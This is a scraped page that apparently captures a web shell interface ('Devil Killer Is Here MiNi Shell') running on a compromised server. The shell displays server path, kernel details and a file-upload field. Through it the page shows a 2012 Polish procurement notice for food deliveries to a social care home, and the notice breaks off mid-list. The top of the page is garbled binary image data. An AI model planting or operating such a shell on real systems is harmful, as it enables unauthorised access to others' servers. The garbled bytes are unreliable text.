JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121121/246253-N-2012.html

<p class="kh_header"><b>Końskie: Dostawa artykułów żywnościowych do Domu Pomocy Społecznej ETOLA w Rudzie Pilczyckiej (VII części zamówienia)</b><br>
<b>Numer ogłoszenia: 246253 - 2012; data zamieszczenia: 21.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Konecki , ul. Staszica 2, 26-200 Końskie, woj. świętokrzyskie, tel. 0-41 372 41 34, faks 0-41 372 83 20.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do Domu Pomocy Społecznej ETOLA w Rudzie Pilczyckiej (VII części zamówienia).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  dostawa artykułów żywnościowych do Domu Pomocy Społecznej ETOLA w Rudzie Pilczyckiej zgodnie z opisem  zawartym w rozdziale IV (części zamówienia)

IV. Części zamówienia
Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę na jedną lub wszystkie grupy. Oferta częściowa musi obejmować wszystkie pozycje określone w danej grupie. Oferta częściowa musi obejmować co najmniej jedną z poniższych grup.
Grupa I. Pieczywo
Grupa II. Przetwory sypkie, przyprawy, produkty strączkowe, przetwory, napoje
Grupa  III. Drób i przetwory drobiowe
Grupa  IV. Nabiał i przetwory nabiałowe
Grupa  V. Mięso wieprzowe , wędliny i wyroby podrobowe
Grupa VI.  Art. spożywcze mrożone , ryby wędzone i solone
               Grupa VII . Jaja

1.	Dostawa art. żywnościowych
1.1	Przedmiotem zamówienia jest zakup i dostawa artykułów żywnościowych zgodnie z wykazem   zamieszczonym w grupach I-VII
1.2	Wykonawca winien dokładnie zapoznać się ze wszystkimi zapisami SIWZ
1.3	Treść oferty musi odpowiadać treści SIWZ i być zgodna z powszechnie obowiązującymi przepisami prawa. Jeśli w opisie zamówienia - formularz ofertowy- Zamawiający wskazał konkretny znak towarowy produktu, to Wykonawca ma możliwość zaoferowanie produktu równoważnego i powinien podać nazwę oferowanego produktu równoważnego. Brak takiego zapisu spowoduje uznanie, że Wykonawca oferuje produkt wskazany przez Zamawiającego.
1.4	Wykonawca który powołuje się na rozwiązania równoważne opisane przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy- produkty- spełniają wymagania określone przez Zamawiającego-(art. 30 ust 5 ustawy PZP). 
1.5	Wymogi dodatkowe:
- artykuły będące przedmiotem zamówienia powinny być pierwszej jakości, posiadać wymagane atesty i terminy ważności, być odpowiednio opakowane i transportowane w warunkach spełniających wszystkie wymogi sanitarne,
-dostawa na koszt i ryzyko transportem Wykonawcy do magazynu zamawiającego,
- dostawy częściowe, sukcesywne, uruchamiane telefonicznie,
-zmiana cen w trakcie realizacji umowy może nastąpić tylko na skutek okoliczności których nie można było  przewidzieć w chwili jej zawarcia, 
1.6	 Ilości podane w grupach I- VII są szacunkowe i mogą ulec zmianie (zmniejszeniu lub zwiększeniu nie więcej niż o 20%). Z tego tytułu wykonawcy nie będą przysługiwały żadne roszczenia wobec zamawiającego.
Grupa I    Pieczywo
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Chleb żytni krojony                                     1 kg	Szt.	8 500
2.		Chleb pełnoziarnisty krojony                       1kg	Szt.	4 700
3.		Chleb razowy krojony                                   1 kg	Szt.	5 000
4.		Bułka wrocławska                                       100 g	Szt.	28 000
5.		Bułka razowa                                               100 g	Szt.	3 000
6.		Bułka pełnoziarnista                                   100 g	Szt.	1 400






Grupa II     Przetwory sypkie, przyprawy, produkty strączkowe, 
przetwory, napoje
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Ananas plastry                                                     565 g	Szt.	170
2.		Aromaty do ciast                                                   10 g	Szt.	100
3.		Barszcz czerwony (koncentrat)                      320 ml	Szt. 	70
4.		Bazylia                                                                     10 g	Szt.	40
5.		Brzoskwinie w syropie                                        820 g	Szt.	80
6.		Budyń różne smaki Winiary                           60-64 g	Szt.	1 000
7.		Bułka tarta                                                             1  kg	kg	180
8.		Chrzan tarty                                                         290 g	Szt.	180
9.		Ciastka biszkopty  Wrocławskie Mamut         120 g	Szt.	100
10.		Cukier kryształ                                                        1 kg	kg	2 600
11.		Cukier waniliowy                                                   32 g	Szt.	230
12.		Cynamon                                                                 20 g	Szt.	40
13.		Drożdże świeże                                                     100g	Szt.	100
14.		Dżem owocowy (różne smaki) Pińczów          280 g	Szt.	400
15.		Dżem bezcukrowy (różne smaki)  Stovit         220 g	Szt.	50
16.		Fasola czerwona konserwowa                           400g	Szt.	180
17.		Fasola Jaś                                                               1 kg	kg	160
18.		Filety śledziowe w oleju                                     170 g	Szt.	650
19.		Filety śledziowe w pomidorach                        170 g	Szt.	500
20.		Galaretka owocowa   Delekta                             75 g	Szt.	600
21.		Gałka muszkatołowa                                             15 g	Szt.	25
22.		Groch łuskany                                                         1 kg	Kg	150
23.		Groszek konserwowy                                         400 g	Szt.	650
24.		Herbata                                                                   1 kg	kg	80
25.		Herbata owocowa Saga (op. 25 torebek)	op.	50
26.		Imbir mielony                                                         20 g	szt.	25
27.		Kakao                                                                     200 g	Szt.	60
28.		Kasza gryczana                                                       1 kg	kg	130
29.		Kasza jęczmienna                                                  1 kg	kg	270
30.		Kasza kukurydziana                                               1 kg	kg	60
31.		Kasza manna                                                          1 kg	kg	130
32.		Kaszka mleczno -ryżowa truskawkowa Nestle                     230g 	Szt.	10
33.		Kawa zbożowa                                                     500 g	Szt.	40
34.		Ketchup łagodny                                                 500 g	Szt.	220
35.		Kisiel różne smaki Winiary                                   77 g	Szt.	1 000
36.		Kminek                                                                    20 g	Szt.	70
37.		Koncentrat pomidorowy 30%  Pińczów           950g	Szt.	250
38.		Konserwa mięsna  
Przysmak Śniadaniowy                                       300 g	Szt.	650
39.		Koperek suszony                                                    10 g	Szt.	90
40.		Kostki rosołowe drobiowe Winiary                   60 g	Szt.	160
41.		Kostki rosołowe wołowe Winiary                       60 g	Szt.	150
42.		Krem do smarowania pieczywa o smaku czekoladowym                                                     200 g	Szt.	100
43.		Krem do smarowania pieczywa o smaku orzechowym                                                        200 g	Szt.	100
44.		Kukurydza konserwowa                                     400 g	Szt.	350
45.		Kwasek cytrynowy                                                 20 g	Szt.	130
46.		Liść laurowy                                                              7 g	Szt.	85
47.		Majeranek                                                                 8 g	Szt.	120
48.		Majonez  Kielecki                                                500 g	Szt.	600
49.		Makaron nitki Lubella                                           2 kg	kg	380
50.		Makaron łazanki Lubella                                      2 kg	Kg	90
51.		Makaron muszelki  Lubella                                  2 kg	Kg	250
52.		Makaron spaghetti Lubella                                  1 kg	Kg	60
53.		Makaron świderki  Lubella                                   2 kg	kg	450
54.		Margaryna śniadaniowa Bielmar                     500 g	kg	610
55.		Margaryna zwykła                                              250 g	kg	220
56.		Marmolada   Duchnice                                       850 g	Szt.	150
57.		Marynata klasyczna Prymat                                20 g	Szt.	55
58.		Marynata staropolska  Kamis                              20 g	Szt.	110
59.		Masło roślinne kubek Kruszwica                     250 g	kg	400
60.		Mąka pszenna wrocławska                                1 kg	kg	450
61.		Mąka ziemniaczana                                               1 kg	kg	15
62.		Mąka żytnia typ 500                                              1 kg	kg	120
63.		Miód pszczeli  wielokwiatowy                          370 g	Szt.	150
64.		Mlekołaki kulki, kółka kakaowe                       250 g	Szt.	30
65.		Morele suszone                                                   150 g	Szt.	10
66.		Musztarda   stołowa                                           190 g	Szt.	300
67.		Ocet                                                                         0,5 l	Szt.	10
68.		Ogórki konserwowe                                            850 g	Szt.	500
69.		Olej uniwersalny   Kruszwica                                  1 l                                 	L	480
70.		Oregano                                                                  10 g	Szt.	30
71.		Papryka konserwowa                                         780 g	Szt.	110
72.		Papryka ostra                                                         20 g	Szt.	65
73.		Papryka słodka                                                       20 g	Szt.	80
74.		Pasztet drobiowy  Podlaski                                155 g                                              	Szt.	700
75.		Pasztet Mazowiecki                                             460g	Szt.	280
76.		Pieczarki marynowane                                       770 g	Szt.	200
77.		Pieprz naturalny mielony                                     20 g	Szt.	420
78.		Pieprz ziołowy                                                        20 g	Szt.	420
79.		Pietruszka Suszona                                                10 g                                   	Szt.	100
80.		Płatki jęczmienne                                                  1 kg	kg	55
81.		Płatki kukurydziane                                               1 kg	kg	40
82.		Płatki owsiane                                                        1 kg	kg	60
83.		Pomidory obierane                                             400 g	Szt.	170
84.		Powidła węgierkowe                                          280 g	Szt.	90
85.		Proszek do pieczenia                                            30 g	Szt.	50
86.		Przyprawa do drobiu Cykoria                              40 g	Szt.	50
87.		Przyprawa do ryb Cykoria                                    40 g	Szt.	60
88.		Przyprawa do ziemniaków  Cykoria                   30 g	Szt.	50
89.		Przyprawa  Warzywko                                          1 kg	kg	35
90.		Przyprawa w płynie  Maggi                                     1 l	l	110
91.		Rodzynki                                                               100 g	Szt.	100
92.		Ryż długo ziarnisty biały                                       1 kg	kg	420
93.		Sałatka rybna                                                        150g	Szt.	1400
94.		Sok pomidorowy  Hortex                                       1 l	Szt.	10
95.		Słodzik                                                     op. 1000 szt.	Op.	30
96.		Sól jodowana                                                          1 kg	kg	450
97.		Suchary delikatesowe Mamut                          285 g 	Szt.	10
98.		Susz Warzywny                                                    100 g	Szt.	30
99.		Syrop owocowy Łowicz różne smaki              440ml	Szt.	600
100.		Szczaw konserwowy                                           285 g	Szt.	90
101.		Szprot w oleju                                                     170 g	Szt.	600
102.		Szprot w pomidorach                                         170 g	Szt.	350
103.		Szynka konserwowa mielona  Werbliński       110 g	Szt.	1 000
104.		Śliwki suszone bez pestki                                  150 g	Szt.	100
105.		Tuńczyk w oleju                                                   170 g	Szt.	750
106.		Wiórki kokosowe                                                 100 g	Szt.	10
107.		Woda mineralna gazowana                                 1,5 l	Szt.	800
108.		Woda mineralna niegazowana                           1,5 l	Szt.	200
109.		Zacierki                                                                    1 kg	kg	75
110.		Ziele angielskie                                                       15 g	Szt.	120
111.		Zioła prowansalskie                                              10 g	Szt.	85
112.		Zupa grzybowa  Winiary                                       48 g	Szt.	500
113.		Zupa pieczarkowa Winiary                                   45 g	Szt.	350
114.		Zupa ogonowa Winiary                                        41 g	Szt.	300
115.		Żelatyna spożywcza                                              40 g 	Szt.	100
116.		Soda oczyszczona                                               100 g	Szt.	10


Grupa III  Drób i przetwory drobiowe
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Kurczak schłodzony	kg	900
2.		Korpusy z kurczaka	kg	500
3.		Filet z kurczaka	kg	600
4.		Ćwiartki  z kurczaka	kg	850
5.		Wątróbka drobiowa	Kg	110
6.		Żołądki z kurczaka	kg	200
7.		Mięso drobiowe gulaszowe II	Kg	200



Grupa IV       Nabiał i przetwory nabiałowe
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Mleko w proszku odtłuszczone	kg	1 000
2.		Twaróg  półtłusty 	kg	540
3.		Masło extra   82% tłuszczu                       200 g                           	kg	250
4.		Ser żółty  Gouda	kg	270
5.		Jogurt owocowy                                        150 g	Szt.	4 600
6.		Jogurt naturalny                                         450 g	Szt.	1200
7.		Serek topiony   krem. op.                          100 g	Szt.	2 000
8.		Serki homogenizowane waniliowe          100 g	Szt.	350
9.		Serki homogenizowane owocowe          100 g	Szt.	350
10.		Kefir  kubek                                                  450 g	Szt.	850
11.		Śmietana  24 %  kubek                            400 ml	Szt.	1 000
12.		Śmietana 12%  karton       poj.               500ml	Szt.	300









Grupa V         Mięso wieprzowe , wędliny  i wyroby podrobowe
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Żeberka wieprzowe	kg	380
2.		Boczek surowy bez skóry wieprzowy 	kg	260
3.		Schab  bez kości wieprzowy	kg	280
4.		Szynka bez kości wieprzowa bez skóry	kg	350
5.		Łopatka bez kości wieprzowa bez skóry	kg	350
6.		Słonina wieprzowa bez skóry	kg	200
7.		Podroby wieprzowe bez wątroby	kg	200
8.		Podgardle wieprzowe	kg	20
9.		Głowizna wieprzowa	kg	370
10.		Mięso wieprzowe II 	kg	340
11.		Wątroba wieprzowa 	kg	100
12.		Karczek wieprzowy bez kości	Kg	200
13.		Kości wieprzowe wędzone	Kg	120
14.		Kiełbasa szynkowa wieprzowa	kg	70
15.		Kiełbasa  mielonka tyrolska	Kg	250
16.		Mortadela bez dodatków	Kg	250
17.		Kiełbasa cienka zwyczajna	kg	550
18.		Parówki  wieprzowe	kg	280
19.		Parówki drobiowe	Kg	200
20.		Kiełbasa  krakowska parzona	kg	120
21.		Kiełbasa biała żurkowa	kg	300
22.		Szynka wędzona	kg	15
23.		Ogonówka wieprzowa wędzona 	kg	20
24.		Boczek wędzony	Kg	70
25.		Pasztet pieczony wieprzowy	Kg	160
26.		Salceson  włoski	kg	250
27.		Salceson  czarny	kg	200
28.		Pasztetowa wieprzowa	kg	200
29.		Kaszanka jęczmienna	kg	230
30.		Kiełbasa szynkowa drobiowa	Kg	180

Grupa VI        Art. spożywcze mrożone , ryby wędzone i solone

Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Fasolka szparagowa mrożona                  450 g	Szt.	1 050
2.		Mieszanka kompotowa mrożona                          	kg	180
3.		Mieszanka warzywna mrożona	kg	350
4.		Filet mrożone z miruny	kg	550
5.		Filety śledziowe bez skóry solone	kg	95
6.		Makrela wędzona bez głowy	kg	70



Grupa VII         Jaja
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Jaja 50-60 g	Szt.	22 000.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 PZP (wg wzoru stanowiącego załącznik nr 1A do formularza ofertowego);
2)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, że w zakładzie wykonawcy został wdrożony lub jest wdrażany system analizy zagrożeń HACCP - zgodnie z ustawą z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz. U. Nr 171 poz.1225 ze zm.)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.konecki.wrota-swietokrzyskie.pl/web/guest/dps_ruda_pilczycka_zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej ETOLA
Ruda Pilczycka 57,26-234 Słupia
Dział Administracyjno-Gospodarczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2012 godzina 14:00, miejsce: Dom Pomocy Społecznej ETOLA
Ruda Pilczycka 57,26-234 Słupia
Dział Finansowo-Księgowy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin wykonania zamówienia
1.1.	 Od  02 stycznia 2013 do 31 grudnia 2013
1.2.	Dostawy częściowe, sukcesywne, uruchamiane telefoniczne, częstotliwość dostaw jak niżej:

Grupa I. Pieczywo - codziennie oprócz niedziel i dni świątecznych - w godz. 6:00-6:40
 Grupa II. Przetwory sypkie,  przyprawy, produkty strączkowe ,przetwory, napoje- 1 raz 
                  w  tygodniu - w godz. 8:00 -15:00
Grupa III. Drób i przetwory drobiowe - 4 razy w miesiącu - w godz. 8:00 -15:00
Grupa IV. Nabiał i przetwory nabiałowe - 1 raz w tygodniu - w godz. 8:00 -15:00
Grupa V. Mięso wieprzowe , wędliny i wyroby podrobowe- 3 razy w tygodniu - w godz. 8:00 -15:00
Grupa VI. Art. spożywcze mrożone , ryby wędzone i solone - 1 raz w tygodniu - w godz. 8:00 -15:00
Grupa VII. Jaja - 1 raz w tygodniu - w godz. 8:00 -15:00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Chleb żytni krojony                                     1 kg	Szt.	8 500
2.		Chleb pełnoziarnisty krojony                       1kg	Szt.	4 700
3.		Chleb razowy krojony                                   1 kg	Szt.	5 000
4.		Bułka wrocławska                                       100 g	Szt.	28 000
5.		Bułka razowa                                               100 g	Szt.	3 000
6.		Bułka pełnoziarnista                                   100 g	Szt.	1 400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przetwory sypkie, przyprawy, produkty strączkowe, 
przetwory, napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Ananas plastry                                                     565 g	Szt.	170
2.		Aromaty do ciast                                                   10 g	Szt.	100
3.		Barszcz czerwony (koncentrat)                      320 ml	Szt. 	70
4.		Bazylia                                                                     10 g	Szt.	40
5.		Brzoskwinie w syropie                                        820 g	Szt.	80
6.		Budyń różne smaki Winiary                           60-64 g	Szt.	1 000
7.		Bułka tarta                                                             1  kg	kg	180
8.		Chrzan tarty                                                         290 g	Szt.	180
9.		Ciastka biszkopty  Wrocławskie Mamut         120 g	Szt.	100
10.		Cukier kryształ                                                        1 kg	kg	2 600
11.		Cukier waniliowy                                                   32 g	Szt.	230
12.		Cynamon                                                                 20 g	Szt.	40
13.		Drożdże świeże                                                     100g	Szt.	100
14.		Dżem owocowy (różne smaki) Pińczów          280 g	Szt.	400
15.		Dżem bezcukrowy (różne smaki)  Stovit         220 g	Szt.	50
16.		Fasola czerwona konserwowa                           400g	Szt.	180
17.		Fasola Jaś                                                               1 kg	kg	160
18.		Filety śledziowe w oleju                                     170 g	Szt.	650
19.		Filety śledziowe w pomidorach                        170 g	Szt.	500
20.		Galaretka owocowa   Delekta                             75 g	Szt.	600
21.		Gałka muszkatołowa                                             15 g	Szt.	25
22.		Groch łuskany                                                         1 kg	Kg	150
23.		Groszek konserwowy                                         400 g	Szt.	650
24.		Herbata                                                                   1 kg	kg	80
25.		Herbata owocowa Saga (op. 25 torebek)	op.	50
26.		Imbir mielony                                                         20 g	szt.	25
27.		Kakao                                                                     200 g	Szt.	60
28.		Kasza gryczana                                                       1 kg	kg	130
29.		Kasza jęczmienna                                                  1 kg	kg	270
30.		Kasza kukurydziana                                               1 kg	kg	60
31.		Kasza manna                                                          1 kg	kg	130
32.		Kaszka mleczno -ryżowa truskawkowa Nestle                     230g 	Szt.	10
